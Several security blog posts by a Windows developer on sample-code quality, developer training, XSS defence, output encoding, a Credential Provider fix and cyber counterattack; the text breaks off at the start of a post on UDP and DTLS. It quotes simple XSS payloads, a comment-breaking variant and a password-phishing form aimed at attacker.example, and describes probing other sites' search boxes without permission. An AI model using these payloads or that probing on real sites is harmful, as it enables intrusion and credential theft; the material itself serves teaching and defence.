
Programmer Hubris

There is no such thing as “small sample code”

Every few months, something prompts me to tweet that:

There is no such thing as “small sample code”, every sample you publish is an SDK of its own

OK, so the choice of calling these “SDKs” is rooted in my Microsoft dev background, where “sample code” didn’t need documentation or bug tracking, whereas an SDK does. You can adjust the terminology to suit.

The basic point here is to remind you that you do not get to abdicate all responsibility by saying “this is sample code, you will need to add error checking and security”, even if you do say it in the article – even if you say it in the comments of the sample!

Why do I care so much? It’s only three lines of code!

Simply stated, I’ve seen too many cases where people have included three lines of code (or five, or twenty – the count doesn’t matter) in a program, then stepped away and shipped that code.

“It wasn’t my fault,” they say, when the incident happens, “I copied that code from a sample online.”

This is the point at which the re-education machine is engaged – because, of course, it totally is your fault, if you include code in your development without treating it with the same rigour as if you had written every line of it yourself. You will get punished – usually by having to stay late and fix it.

It’s also the sample writer’s fault.

He gave you the mini-SDK that you imported blindly into your application, without testing it, without checking errors in it, without appropriate security measures, and he brushed you off with “well, of course, you should add your own error checks and security magic to it”.

Here’s an example of what I’m talking about, courtesy of Troy Hunt linking to an ASP forum.

No – if you’re providing sample code on the Internet, it’s important to make sure it doesn’t embody BAD design; this is code that will be taken up by people who are, by definition, less keen, less eager, less smart and less motivated to do things right than you are. After all, rather than figuring out how to write this code for themselves, they are allowing you to do it for them, to teach them how it’s done. If you then teach them how it’s done badly, that’s how they will learn to do it – badly. And they will teach others.

So, instead, make your three-line samples five lines, and add enough error checking that unexpected issues or other bad things loudly break the sample’s execution, rather than being silently ignored.
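To make that concrete, here’s a hypothetical “read a config value” sample – a minimal sketch (the file name and messages are mine, purely for illustration) of what happens when the three-line version grows its own error checks:

    #include <cstdio>
    #include <cstdlib>

    int main()
    {
        // Check the open - the "three-line" version just assumes success.
        FILE *fp = std::fopen("config.txt", "r");
        if (fp == NULL)
        {
            std::perror("config.txt");
            return EXIT_FAILURE;
        }

        // Check the read, too - an empty file is an error worth reporting.
        char buf[256];
        if (std::fgets(buf, sizeof(buf), fp) == NULL)
        {
            std::fputs("config.txt: empty or unreadable\n", stderr);
            std::fclose(fp);
            return EXIT_FAILURE;
        }

        std::printf("First line: %s", buf);
        std::fclose(fp);
        return EXIT_SUCCESS;
    }

Three lines became twenty-odd, but every failure now stops the sample where it happens, instead of in the program of whoever copied it.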

Oh yeah, and what about updates, when you find a horrendous bug – how do you distribute those?

Why don’t we do that?

Reading a story on the consequences of the theft of Adobe’s source code by hackers, I come across this startling phrase:

The hackers seem to be targeting vulnerabilities they find within the stolen code. The prediction is that they’re sifting through the code, attempting to find widespread weaknesses, intending to exploit them with maximum effect by using zero-day attacks.

What I’d love to know is why we aren’t seeing a flood of developers crying out to be educated in how they, too, can sift through their own code and find widespread weaknesses, so they can shore those up and prevent their code from being exploited.

An example of the sort of comments we are seeing can be found here, and they are fairly predictable – “does this mean Open Source is flawed, if having access to the source code is a security risk”, schadenfreude at Adobe’s misfortune, all manner of assertions that Adobe weren’t a very secure company anyway, etc.

Something that’s missing is an acknowledgement that we are all subject to the same pool of developers.

And attackers.

So, if you’re in the business of developing software – whether to sell, license, give away, or simply to use in your own endeavours – you’re essentially in the same boat as Adobe prior to the hackers breaching their defences. Possibly the same boat as Adobe after the breach, but prior to the discovery.

Unless you are doing something different to what Adobe did, you are setting yourself up to be the next Adobe.

Obviously, Adobe isn’t giving us entire details of their own security program, and what’s gone right or wrong with it, but previous stories (as early as mid-2009) indicated that they were working closely with Microsoft to create an SDL (Security Development Lifecycle) for Adobe’s development.

So, instead of being all kinds of smug that Adobe got hacked, and you didn’t, maybe you should spend your time wondering if you can improve your processes to even reach the level Adobe was at when they got hacked.

And, to bring the topic back to what started the discussion – are you even doing to your software what these unidentified attackers are doing to Adobe’s code?

Are you poring over your own source code to find flaws?

How long are you spending to do that, and what tools are you using to do so?

Training developers to write secure code

I’ve done a fair amount of developer training recently, and it seems like there are a number of different kinds of responses to my security message.

[You can safely assume that there’s also something wrong with the message and the messenger, but I want to learn about the thing I likely can’t control or change – the supply of developers]

Here are some unfairly broad descriptions of stereotypes I’ve encountered along the way. The truth, as ever, is more nuanced, but I think if I can reach each of these target personas, I should have just about everyone covered.

Is there anyone I’ve missed?

The previous victim

I’m always happy to have one or more of these people in the room – the sort of developer who has some experience, and has been on a project that was attacked successfully at some point or another.

This kind of developer has likely quickly learned the lesson that even his own code is subject to attack, vulnerable and weak to the persistent probes of attackers. Perhaps his experience has also included examples of his own failures in more ordinary ways – mere bugs, with no particular security implications.

Usually, this will be an older developer, because experience is required – and his tales of terror, unrehearsed and true, can sometimes provide the “scared straight” lesson I try to deliver to my students.

The previous attacker

This guy is usually a smart, younger individual. He may have had some previous nefarious activity, or simply researched security issues by attacking systems he owns.

But for my purposes, this guy can be too clever, because he distracts from my talk of ‘least privilege’ and ‘defence in depth’ with questions about race conditions, side-channel attacks, sub-millisecond time deltas across multi-second latency routes, and the like. If those were the worst problems we see in this industry, I’d focus on them – but sadly, sites are still vulnerable to simple attacks, like my favourite – Reflected XSS in the Search field. [Simple exercise – watch a commercial break, and see how many of the sites advertised there have this vulnerability in them.]

But I like this guy for other reasons – he’s a possible future hire for my team, and a probable future assistant in finding, reporting and addressing vulnerabilities. Keeping this guy interested and engaged is key to making sure that he tells me about his findings, rather than sharing them with friends on the outside, or exploiting them himself.

“I did a security class at college”

Unbelievably to me, there are people who have “done a project on it”, and therefore know all they want to about security. If what I was about to tell them was important, they’d have been told it by their professor at college, because their professor knew everything of any importance.

I personally wonder if this is going to be the kind of SDE who will join us for a short while, and not progress – because the impression they give to me is that they’ve finished learning right before their last final exam.

Salaryman

Related to the previous category is the developer who only does what it takes to get paid and to receive a good performance review.

I think this is the developer I should work the hardest to try and reach, because this attitude lies at the heart of every developer on their worst days at their desk. When the passion wanes, or the task is uninteresting, the desire to keep your job, continue to get paid, and progress through your career while satisfying your boss is the grinding cog that keeps you moving forward like a wind-up toy.

This is why it is important to keep searching to find ways of measuring code quality, and rewarding people who exhibit it – larger rewards for consistent prolonged improvement, smaller but more frequent rewards to keep the attention of the developer who makes a quick improvement to even a small piece of code.

Sadly, this guy is in my class because his boss told him he ought to attend. So I tell him at the end of my class that he needs to report back to his boss the security lesson that he learned – that all of his development-related goals should have the adverb “securely” appended to them. So “develop feature X” becomes “develop feature X securely”. If that is the one change I can make to this developer’s goals, I believe it will make a difference.

Fanboy

I’ve been doing this for long enough that I see the same faces in the crowd over and over again. I know I used to be a fanboy myself, and so I’m aware that sometimes this is because these folks learn something new each time. That’s why I like to deliver a different talk each time, even if it’s on the same subject as a previous lesson.

Or maybe they just didn’t get it all last time, and need to hear it again to get a deeper understanding. Either way, repeat visitors are definitely welcome – but I won’t get anywhere if that’s all I get in my audience.

Vocational

Some developers do the development thing because they can’t NOT write code. If they were independently wealthy and could do whatever they wanted, they’d be behind a screen coding up some fun little app.

I like the ones with a calling to this job, because I believe I can give them enough passion in security to make it a part of their calling as well. [Yes, I feel I have a calling to do security – I want to save the world from bad code, and would do it if I was independently wealthy.]

Stereotypical / The Surgeon

Sadly, the hardest person to reach – harder even than the Salaryman – is the developer who matches the stereotypical perception of the developer mindset.

Convinced of his own superiority and cleverness, even if he doesn’t express it directly in such conceited terms, this person will see every suggested approach as beneath him, and every example of poor code as yet more proof of his own superiority.

“Sure, you’ve had problems with other developers making stupid security mistakes,” he’ll think to himself, “But I’m not that dumb. I’ve never written code that bad.”

I certainly hope you won’t ever write code as bad as the examples I give in my classes – those are errant samples of code written in haste, and which I wouldn’t include in my class if they didn’t clearly illustrate my point. But my point is that your colleagues – everyone around you – are going to write this bad a piece of code one day, and it is your job to find it. It is also their job to find it in the code you write, so either you had better be truly as good as you think you are, or you had better apply good security practices so they don’t find you at your worst coding moment.

Playing with security blogs

I’ve found a new weekend hobby – it takes only a few minutes, is easily interruptible, and reminds me that the state of web security is such that I will never be out of a job.

I open my favourite search engine (I’m partial to Bing, partly because I get points, but mostly because I’ve met the guys who built it), search for “security blog”, and then pick one at random.

Once I’m at the security blog site – often one I’ve never heard of, despite it being high up in the search results – I find the search box and throw a simple reflected XSS attack at it.

If that doesn’t work, I view the source code for the results page I got back, and use the information I see there to figure out what reflected XSS attack will work. Then I try that.
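For the avoidance of doubt about how simple “simple” is: the first probe is usually nothing cleverer than searching for <script>alert(1)</script>, and when the page reflects my term inside a quoted attribute instead, the follow-up is the close-the-quote-first variant, "><script>alert(1)</script> – the same two examples I walk through in “On new exploit techniques”, below.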

[Note: I use reflected XSS, because I know I can only hurt myself. I don’t play stored XSS or SQL injection games, which can easily cause actual damage at the server end, unless I have permission and I’m being paid.]

Finally, I try to find who I should contact about the exploitability of the site.

It’s interesting just how many of these sites are exploitable – some of them falling to the simplest of XSS attacks – and even more interesting to see how many sites don’t have a good, responsive contact address (or prefer simply not to engage with vuln discoverers).

So, what do you find?

I clearly wouldn’t dream of disclosing any of the vulnerabilities I’ve found until well after they’re fixed. Of course, after they’re fixed, I’m happy to see a mention that I’ve helped move the world forward a notch on some security scale. [Not sure why I’m not called out on the other version of that changelog.] I might allude to them on my twitter account, but not in any great detail.

Going from clicking the link to a working exploit takes either under ten minutes, or it doesn’t happen at all – and reporting generally takes another ten minutes or so, most of which is spent hunting for the right address. The longer portion of the game is helping some of these guys figure out what action needs to be taken to fix things.

Try using a WAF – NOT!

You can try using a WAF to solve your XSS problem, but then you’ve got two problems – a vulnerable web site, and a set of WAF rules to manage. If you have a lot of spare time, you can use a WAF to shore up known-vulnerable fields and trap known attack strings. But it doesn’t ever really fix the problem.

Don’t echo my search query

If you can, don’t echo back to me what I sent you, because that’s how these attacks usually start. Don’t even include it in comments, because a good attack will just terminate the comment and start injecting HTML or script.
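As a sketch of what that looks like: if my search term is echoed inside <!-- search term: … -->, then a query of --><script>alert(1)</script> terminates the comment, and everything after it is live markup.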

Remove my strange characters

Unless you’re running a source code site, you probably don’t need me to search for angle brackets, or a number of other characters. So take them out of my search – or simply reject the search outright if I include them.

Encode everything

OK, so you don’t have to encode the basics – what are the basics? I tend to start with alphabetic and numeric characters, maybe also a space. Encode everything else.
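Here’s a minimal sketch of that whitelist approach in C++ (the function name is mine, and real code should prefer a vetted library encoder over hand-rolling one):

    #include <cctype>
    #include <cstdio>
    #include <string>

    // Encode everything that isn't alphanumeric or a space as an HTML
    // numeric character reference - the whitelist stays tiny on purpose.
    std::string HtmlEncode(const std::string &input)
    {
        std::string output;
        for (unsigned char ch : input)
        {
            if (std::isalnum(ch) || ch == ' ')
                output += static_cast<char>(ch);
            else
            {
                char buf[16];
                std::snprintf(buf, sizeof(buf), "&#%u;", static_cast<unsigned>(ch));
                output += buf;
            }
        }
        return output;
    }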

Which encoding?

Yeah, that’s always the hard part. Encode it using the right encoding. That’s the short version. The long version is that you figure out what’s going to decode it, and make sure you encode for every layer that will decode. If you’re putting my text into a web page as a part of the page’s content, HTML encode it. If it’s in an attribute string, quote the characters using HTML attribute encoding – and make sure you quote the entire attribute value! If it’s an attribute string that will be used as a URL, you should URL encode it. Then you can HTML encode it, just to be sure.
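In code terms, the layering looks something like this – a sketch that reuses the HtmlEncode idea above, with an equally hand-rolled UrlEncode, both just for illustration:

    #include <cctype>
    #include <cstdio>
    #include <string>

    // Innermost decoder first: percent-encode for the URL parser.
    std::string UrlEncode(const std::string &input)
    {
        std::string output;
        for (unsigned char ch : input)
        {
            if (std::isalnum(ch))
                output += static_cast<char>(ch);
            else
            {
                char buf[8];
                std::snprintf(buf, sizeof(buf), "%%%02X", static_cast<unsigned>(ch));
                output += buf;
            }
        }
        return output;
    }

    // A user-supplied value landing in an href attribute gets both layers,
    // in order - URL encoding for the URL parser, then HTML encoding for
    // the HTML parser, which runs first when the page is read:
    //
    //     std::string href = HtmlEncode(UrlEncode(userSuppliedValue));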

[Then, of course, check that your encoding hasn’t killed the basic function of the search box!]

Respond to security reports

You should definitely respond to security reports. I understand that not everyone can have a 24/7 response team watching their blog (I certainly don’t), but you should try to respond within a couple of days, and anything under a week is probably going to be alright. Some vuln discoverers are upset if they don’t get a response much sooner, and see that as cause to publish their findings.

Me, I send a message first to ask if I’ve found the right place to send a security vulnerability report to, and only when I receive a positive acknowledgement do I send on the actual details of the exploit.

Be like Billy – Mind your XSS Manners!

I’ve said before that I wish programmers would respond to reports of XSS as if I’d told them I caught them writing a bubble sort implementation in Cobol. Full of embarrassment at being such a beginner.

Credential Provider update – Windows 8 SDK breaks a few things…

You’ll recall that back in February of 2011, I wrote an article on implementing your first Credential Provider for Windows 7 / 8 / Server 2008 R2 / Server 2012 – and it’s been a fairly successful post on my blog.

Just recently, I received a report from one of my users that my version of this was no longer wrapping the password provider on Windows Server 2008 R2.

As you’ll remember from that earlier article, it’s a little difficult (but far from impossible) to debug your virtual machine to get information out of the credential provider while it runs.

Just not getting called

Nothing seemed to be obviously wrong – the setup was still executing the same way, but the code just wasn’t getting called. For the longest time I couldn’t figure it out.

Finally, I took a look at the registry entries.

My code was installing itself to wrap the password provider with CLSID “{60b78e88-ead8-445c-9cfd-0b87f74ea6cd}”, but the password provider in Windows Server 2008 R2 appeared to have CLSID “{6f45dc1e-5384-457a-bc13-2cd81b0d28ed}”. Subtle, to be sure, but obviously different.

I couldn’t figure out immediately why this was happening, but I eventually traced back through the header files where CLSID_PasswordCredentialProvider was defined, and found the following:

    EXTERN_C const CLSID CLSID_PasswordCredentialProvider;

    #ifdef __cplusplus
    class DECLSPEC_UUID("60b78e88-ead8-445c-9cfd-0b87f74ea6cd") PasswordCredentialProvider;
    #endif

    EXTERN_C const CLSID CLSID_V1PasswordCredentialProvider;

    #ifdef __cplusplus
    class DECLSPEC_UUID("6f45dc1e-5384-457a-bc13-2cd81b0d28ed") V1PasswordCredentialProvider;
    #endif

As you can see, in addition to CLSID_PasswordCredentialProvider, there’s a new entry, CLSID_V1PasswordCredentialProvider, and it’s this that points to the class ID that Windows Server 2008 R2 uses for its password credential provider – and which I should have been wrapping with my code.

The explanation is obvious

It’s clear what happened here with a little research. For goodness-only-knows-what-unannounced-reason, Microsoft chose to change the class ID of the password credential provider in Windows 8 and Windows Server 2012. And, to make sure that old code would continue to work in Windows 8 with just a recompile, of course they made sure that the OLD name “CLSID_PasswordCredentialProvider” would point to the NEW class ID value. And, as a sop to those of us supporting old platforms, they gave us a NEW name “CLSID_V1PasswordCredentialProvider” to point to the OLD class ID value.

And then they told nobody, and included it in Visual Studio 2012 and the Windows 8 SDK.

In fact, if you go searching for CLSID_V1PasswordCredentialProvider, you’ll find there’s zero documentation on the web at all. That’s pretty much unacceptable behaviour – introducing a significant breaking change like this without documentation.

So, how to support both values?

Supporting both values requires you to try to load each class in turn, and to save details indicating which one you’ve loaded. I went for this rather simple code in SetUsageScenario:

    IUnknown *pUnknown = NULL;
    // Try the current (Windows 8 / Server 2012) class ID first.
    _pWrappedCLSID = CLSID_PasswordCredentialProvider;
    hr = ::CoCreateInstance(CLSID_PasswordCredentialProvider, NULL, CLSCTX_ALL, IID_PPV_ARGS(&pUnknown));
    if (hr == REGDB_E_CLASSNOTREG)
    {
        // Not registered - fall back to the old (Windows 7 / Server 2008 R2) class ID.
        _pWrappedCLSID = CLSID_V1PasswordCredentialProvider;
        hr = ::CoCreateInstance(CLSID_V1PasswordCredentialProvider, NULL, CLSCTX_ALL, IID_PPV_ARGS(&pUnknown));
    }

Pretty dead simple, I hope you’ll agree – the best code often is.

Of course, if you’re filtering on credential providers, and hope to hide the password provider, you’ll want to filter both providers there, too. Again, here’s my simple code for that in Filter:

    // Hide both the current and the V1 password providers.
    if (IsEqualGUID(rgclsidProviders[i], CLSID_PasswordCredentialProvider))
        rgbAllow[i] = FALSE;
    if (IsEqualGUID(rgclsidProviders[i], CLSID_V1PasswordCredentialProvider))
        rgbAllow[i] = FALSE;

If that wasn’t nasty enough…

Ironically, the Windows 8 SDK and Visual Studio 2012 did another thing for me: they disabled the execution of my code on Windows XP, impacting the Windows XP version of the same package (which uses a WinLogon Notification Provider, instead of a Credential Provider).

This time, they did actually say something about it, though, which allowed me to trace and fix the problem just a little bit more quickly.

The actual blog post (not official documentation, just a blog post) that describes this change is here:

Windows XP Targeting with C++ in Visual Studio 2012

What this blog indicates is that a deliberate step was taken to disable Windows XP support in executables generated by Visual Studio 2012. You have to go back and make changes to your projects in order to continue supporting Windows XP.
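For anyone hitting the same wall: as I recall it, the change the post describes boils down to a single project setting – switching the Platform Toolset (under Project Properties, General) from the default v110 to the XP-capable v110_xp toolset that a Visual Studio 2012 update installs – but it’s a change you have to know to go and make.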

That’s not perhaps so bad, because really, Windows XP is pretty darn old. In fact, a year from now it’ll be leaving its support lifecycle entirely, and heading into paid “Custom Support”, where you have to pay several thousand dollars for every patch you want to download. I’d upgrade to Windows 7 now, if I were you.

That old “cyber offence” canard again

I’m putting this post in the “Programmer Hubris” section, but it’s really not the programmers this time, it’s the managers. And the lawyers, apparently.

Something set me off again

Well, yeah, it always does, and this time what set me off is an NPR article by Tom Gjelten in a series they’re currently doing on “cybersecurity”.

This article probably had a bunch of men talking back to NPR with expressions such as “hell, yeah!” and “it’s about time!”, or even the more balanced “well, the best defence is a good offence”.

Absolute rubbish. Pure codswallop.

But aren’t we being attacked? Shouldn’t we attack back?

Kind of, and no.

We’re certainly not being “attacked” in the manner described by analogy in the article.

"If you’re just standing up taking blows, the adversary will ultimately hit you hard enough that you fall to the ground and lose the match. You need to hit back." [says Dmitri Alperovitch, CrowdStrike’s co-founder.]

Yeah, except we’re not taking blows, and this isn’t boxing, and they’re not hitting us hard.

"What we need to do is get rid of the attackers and take away their tools and learn where their hideouts are and flush them out," [says Greg Hoglund, co-founder of HBGary, another firm known for being hacked by a bunch of anonymous nerds that he bragged about being all over]

That’s far closer to reality, but the people whose job it is to do that are the duly appointed law enforcement operatives who are able to enforce the law.

"It’s [like] the government sees a missile heading for your company’s headquarters, and the government just yells, ‘Incoming!’ " Alperovitch says. "It’s doing nothing to prevent it, nothing to stop it [and] nothing to retaliate against the adversary." [says Alperovitch again]

No, it’s not really like that at all.

There is no missile. There is no boxer. There’s a guy sending you postcards.

What? Excuse me? Postcards?

Yep, pretty much exactly that.

Every packet that comes at you from the Internet is much like a postcard. It’s got a from address (of sorts) and a to address, and all the information inside the packet is readable. [That’s why encryption is applied to all your important transactions]

So how am I under attack?

There are a number of ways. You might be receiving far more postcards than you can legitimately handle, making it really difficult to assess which are the good postcards, and which are the bad ones. So, you contact the postman, and let him know this, and he tracks down (with the aid of the postal inspectors) who’s sending them, and stops carrying those postcards to you. In the meantime, you learn how to spot the obvious crappy postcards and throw them away – and when you use a machine to do this, it’s a lot less of a problem. That’s a denial of service attack.

Then there’s an attack against your web site. Pretty much, that equates to the postcard sender learning that there’s someone reading the postcards, whose job it is to do pretty much what the postcards tell them to do. So he sends postcards that say “punch the nearest person to you really hard in the face”. Obviously a few successes of this sort lead you to firing the idiot who’s punching his co-workers, and instead training the next guy as to what jobs he’s supposed to do on behalf of the postcard senders.

I’m sure that my smart readers can think up their own postcard-based analogies of other attacks that go on, now that you’ve seen these two examples.

Well if it’s just postcards, why don’t I send some of my own?

Sure, send postcards, but unless you want the postman to be discarding all your outgoing mail, or the law enforcement types to turn up at your doorstep, those postcards had better not be harassing or inappropriate.

Even if you think you’re limiting your behaviour to that which the postman won’t notice as abusive, there’s the other issue with postcards. There’s no guarantee that they were sent from the address stated, and even if they were sent from there, there is no reason to believe that they were official communications.

All it takes is for some hacker to launch an attack from a hospital’s network space, and you’re now responsible for attacking an innocent target where lives could actually be at risk. [Sure, if that were the case, the hospital has shocking security issues of its own, but can you live with that rationalisation if your response to someone attacking your site winds up killing someone?]

I don’t think that counterattack on the Internet is ethical or appropriate.

That “are you kidding me?” moment in customer support

So, my Sunbeam electric blanket died yesterday. Second one in a year.

As a dutiful consumer, I’d really like to report this to the manufacturer, get a replacement and move on. I fill out the “Contact Us” form. Then I get this ludicrous error:

[Screenshot: the form’s validation error, telling the customer not to use quotes, colons or semicolons in their question]

So, you’re going to ask your customers to contact you when they have problems, and then you’re going to actually limit the characters they’re allowed to use in the QUESTION that they’re asking you?

Asking me to avoid using quotes, colons and semicolons in written English is completely ludicrous.

And yes, I know why they do this. It’s because they attended a course on secure programming which told them how to do input validation.

Input validation is not the shizzle

I am constantly amazed at how frequently I have to ram this point home to developers who have learned one trick to protect against injection attacks.

“Validate ALL input – reject the bad characters!” – I’ve heard this from a number of people, including security professionals.

When you CAN do strict input validation based off a restricted whitelist, of course, that’s great – “input a whole number between one and ten” is good for input validation. “Input your name” generally isn’t, because names have a habit of containing ‘bad’ characters, such as the apostrophe in “O’Donnell”. “Input your question”, as in this case, is likely to elicit all kinds of funky characters.
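To make the distinction concrete, here’s a minimal sketch (the function name is mine) of the one case where strict whitelist validation genuinely works – the whole number between one and ten:

    #include <cstdlib>
    #include <string>

    // Strict whitelist validation: accept a whole number from 1 to 10,
    // reject everything else - letters, symbols, empty input, trailing junk.
    bool ValidateOneToTen(const std::string &input)
    {
        char *end = NULL;
        long value = std::strtol(input.c_str(), &end, 10);
        return end != input.c_str()    // some digits were consumed...
            && *end == '\0'            // ...and nothing followed them...
            && value >= 1 && value <= 10;
    }

Try writing the equivalent for “input your name”, and you quickly discover there is no whitelist that keeps O’Donnell happy and the ‘bad’ characters out.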

And, as I ask the candidates in my phone screen interviews: what do you do when you have a web app which stores to a SQL database, and whose task is to store XSS and SQL injection attacks? <sigh> Clearly, you have to use appropriate output encoding. Apparently, Sunbeam’s web developers are not good enough to know when to stop using input validation, and start using output encoding.

Even less smart

My suspicions are confirmed when, after typing in a correctly formed question, the model number of the blanket (which, curiously, isn’t anywhere on the blanket or its controllers), the date code on the plug, and my contact details, the web page unerringly provides me with this as its response:

[Screenshot: the web page’s response]

So, I think our next step is to contact Amazon to resolve this customer service issue properly – and to not buy from Sunbeam again.

On new exploit techniques

Last year’s discussion on “Scriptless XSS” made me realise that there are two kinds of presentation about new exploits – those that talk about a new way to trigger the exploit, and those that talk about a new way to take advantage of the exploit.

Since I didn’t actually see the “Scriptless XSS” presentation at Blue Hat (not having been invited, I think it would be bad manners to just turn up), I won’t address it directly, and it’s entirely possible that much of what I say is actually irrelevant to that particular paper. I’m really being dreadfully naughty here and setting up a strawman to knock down. In the tech industry, this practice is often referred to as “journalism”.

So where’s my distinction?

Let’s say you’re new to XSS. It’s possible many of you actually are new to XSS, and if you are, please read my previous articles about how it’s just another name for allowing an attacker to inject content (usually HTML) into a web page.

Your first XSS exploit example may be that you can put “<script>alert(1)</script>” into a search field, and it gets included without encoding into the body of the results page. This is quite frankly so easy I’ve taught my son to do it, and we’ve had fun finding sites that are vulnerable to this. Of course, we then inform them of the flaw, so that they get it fixed. XSS isn’t perhaps the most damaging of exploits – unlike SQL injection, you’re unlikely to use it to steal a company’s entire customer database – but it is an embarrassing indication that the basics of security hygiene are not being properly followed by at least some of your development team.

The trigger of the exploit here is the angle-bracket markup, and the exploit itself is the injection of script containing an alert(1) command.

Let’s say now that the first thing the programmer tries, to protect his page, is to replace the direct embedding of text with an <input> tag, whose value is set to the user-supplied text, in quotes.

Your original exploit is foiled, because it comes out as:

<input readonly=1 value="<script>alert(1)</script>">

That’s OK, though, because the attacker will see that, and note that all he has to do is provide the terminating quote and angle bracket at the start of his input, to produce instead:

<input readonly=1 value=""><script>alert(1)</script>">

This is a newer method of exploiting XSS-vulnerable code. Although a simple example, this is the sort of thing it’s worth getting excited about.

Why is that exciting?

It’s exciting because it causes a change in how you planned to fix the exploit. You had a fix that prevented the exploit from happening, and now it fails, so you have to rethink this. Any time you are forced to rethink your assumptions because of new external data, why, that’s SCIENCE!

And the other thing is…?

Well, the other thing is noting that if the developer did the stupid thing, and blocked the word “alert”, the attacker can get around that defence by using the “prompt” keyword instead, or by redirecting the web page to somewhere the attacker controls. This may be a new result, but it’s not a new trigger, it’s not a new cause.

When defending your code against attack, always ask yourself which is the trigger of an attack, rather than the body of the attack itself. Your task is to prevent the trigger, at which point the body becomes irrelevant.

Time to defend myself.

I’m sure that someone will comment on this article and say that I’m misrepresenting the field of attack blocking – after all, the XSS filters built into major browsers surely fall into the category of blocking the body, rather than the trigger, of an attack, right?

Sure, and that’s one reason why they’re not 100% effective. They’re a stopgap measure – a valuable stopgap measure, don’t get me wrong – but they work more in the sense of trying to recognise bad guys by the clothing they choose to wear, rather than recognising bad guys by the weapons they carry, or their actions in breaking locks and planting explosives. Anyone who’s found themselves, as I have, in the line of people “randomly selected for searching” at the airport, and looked around and noted certain physical similarities between everyone in the line, will be familiar with the idea that this is more an exercise in increasing irritation than in applying strong security.

It’s also informative to see methods by which attacks are carried out – as they grow in sophistication from fetching immediate cookie data to infecting browser sessions and page load semantics, it becomes easier and easier to tell developers “look at all these ways you will be exploited, and you will begin to see that we can’t depend on blocking the attack unless we understand and block the triggers”.

Keep doing what you’re doing

I’m not really looking to change any behaviours, nor am I foolish enough to think that people will start researching different things as a result of my ranting here.

But, just as I’ve chosen to pay attention to conferences and presentations that tell me how to avoid, prevent and fix, over those that only tell me how to break, I’ll also choose to pay attention to papers that show me an expansion of the science of attacks, their detection and prevention, over those that engage in a more operational view of “so you have an inlet, what do you do with it?”

XSS Hipster loved Scriptless XSS before it was cool

I was surprised last night and throughout today, to see that a topic of major excitement at the Microsoft BlueHat Security Conference was that of “Scriptless XSS”.

The paper presented on the topic certainly repeats the word “novel” a few times, but I will note that if you do a Google or Bing search for “Scriptless XSS”, the first result in each case is, of course, a simple blog post from yours truly, a little over two years ago, in July 2010.

As the article notes, this isn’t even the first time I’d used the idea that XSS (Cross Site Scripting) is a complete misnomer, and that “HTML injection” is a more appropriate description. JavaScript – the “Scripting” in most people’s explanations of Cross Site Scripting – is definitely not required, and is only used because it is an alarmingly clear demonstration that something inappropriate is happening.

Every interview in the security field – every one!

Every time I have had an interview in the security field – that’s since 2006 – I’ve been asked “Explain what Cross Site Scripting is”, and rather hesitantly at first, but with growing surety, I have answered that it is simply “HTML injection”, and the conversation goes wonderfully from there.

Why did I come up with this idea?

Fairly simply, I’ve found that if you throw standard XSS exploits at developers and tell them to fix the flaw, they do silly things like blocking the word “script”. As I’ve pointed out before, Cross Site Scripting (as with all injection attacks) requires an Injection (how the attacker provides their data), an Escape (how the attacker’s data moves from data into code), an Attack or Execution (the payload), and optionally a Cleanup (returning the user’s browser state to normal so they don’t notice the attack happening).
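Mapping those four phases onto the simplest search-box attack (my decomposition, using the examples from “On new exploit techniques” above): the Injection is the text typed into the search field; the Escape is the leading "> that closes the value attribute and the input tag, turning data into markup; the Attack is whatever follows – script, a look-alike form, CSS trickery; and the Cleanup is any trailing markup that tidies up the rest of the page so the victim notices nothing.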

It’s not the script, stupid, it’s the escape.

Attacks are wide and varied – the paper on Scriptless Attacks makes that clear, by presenting a number of novel (to me, at least) attacks using CSS (Cascading Style Sheet) syntax to exfiltrate data by measuring scrollbars. My example attack used nothing so outlandish – just the closure of one form, and the opening of another, with enough CSS attribute monkeying to make it look like the same form. The exfiltration of data in this case is by means of the rather pedestrian method of having the user type their password into a form field and submit it to a malicious site. No messing around with CSS to measure scrollbars and determine the size of fonts.
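In rough markup terms – my reconstruction, not the original post’s exact code – the injected text looks something like </form><form action="https://attacker.example/">, followed by enough styling to pass as the real thing: close the site’s own form, open the look-alike, and let the user hand the password over themselves.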

Hats off to these guys, though.

I will say this – the attacks they present are an interesting and entertaining demonstration that if you’re trying to block the Attack or Cleanup phases of an Injection Attack, you have already failed – you just don’t know it yet. Clearly a lot of work and new study went into these attacks, but it’s rather odd that their demonstrations are about the more complicated end of Scriptless XSS, rather than about the idea that defenders still aren’t aware of how best to defend.

Also, no doubt, they had the sense to submit a paper on this – all I did was blog about it, and provide a pedestrian example with no flashiness to it at all.

Hipster gets no respect.

So, yeah, I was talking about XSS without the S, long before it was cool to do so. As my son informs me, that makes me the XSS Hipster. It’d be gratifying to my ego to get a little nod for that (heck, I don’t even get an invite to BlueHat), but quite frankly rather than feeling all pissed off about that, I’m actually rather pleased that people are working to get the message out that JavaScript isn’t the problem, at least when it comes to XSS.

The problem is the Injection and the Escape – you can block the Injection by either not accepting data, or by having a tight whitelist of good values; and you can block the Escape by appropriately encoding all characters not definitively known to be safe.

UDP and DTLS not a performance improvement.

Saw this update in my Windows Update list recently:

http://support.microsoft.com/kb/2574819

As it stands right now, this is what it says (in part):

[Screenshot of the KB article’s text, part of which is quoted below]

OK, so I started off feeling good about this – what’s not to like about the idea that DTLS, a security layer for UDP that works roughly akin to TLS / SSL for TCP, now can be made a part of Windows?

Sure, you could say “what about downstream versions”, but then again, there’s a point where a developer should say “upgrading has its privileges”. I don’t support Windows 3.1 any more, and I don’t feel bad about that.

No, the part I dislike is this one:

Note DTLS provides TLS functionalities that are based on the User Datagram Protocol (UDP) protocol. Because TLS is based on the Transmission Control Protocol (TCP) protocol, DTLS performs better than TLS.

Wow.

That’s just plain wrong. Actually, I’m not even sure it qualifies as wrong, and it’s quite frankly the sort of mis-statement and outright guff that made me start responding to networking posts in the first place, and which propelled me in the direction of eventually becoming an MVP.

Nerd

Yes, I was the nerdy guy complaining that there were already too many awful networking applications, and that promulgating stupid myths like “UDP performs better than TCP” or “the Nagle algorithm is slowing your app down, just disable it” causes there to be more of the same.

But I think that’s really the point – you actually do want nerds of that calibre writing your network applications, because network programming is not easy – it’s actually hard. As I have put it on a number of occasions, when you’re writing a program that works over a network, you’re only writing one half of the application (if that). The other half is written by someone else – and that person may have read a different RFC (or a different version of the protocol design), may have had a different interpretation of ambiguous (or even completely clear) sections, or could even be out to destroy your program, your data, your company, and anyone who ever trusted your application.

Surviving in those circumstances requires an understanding of the purity of good network code.

But surely UDP is faster?

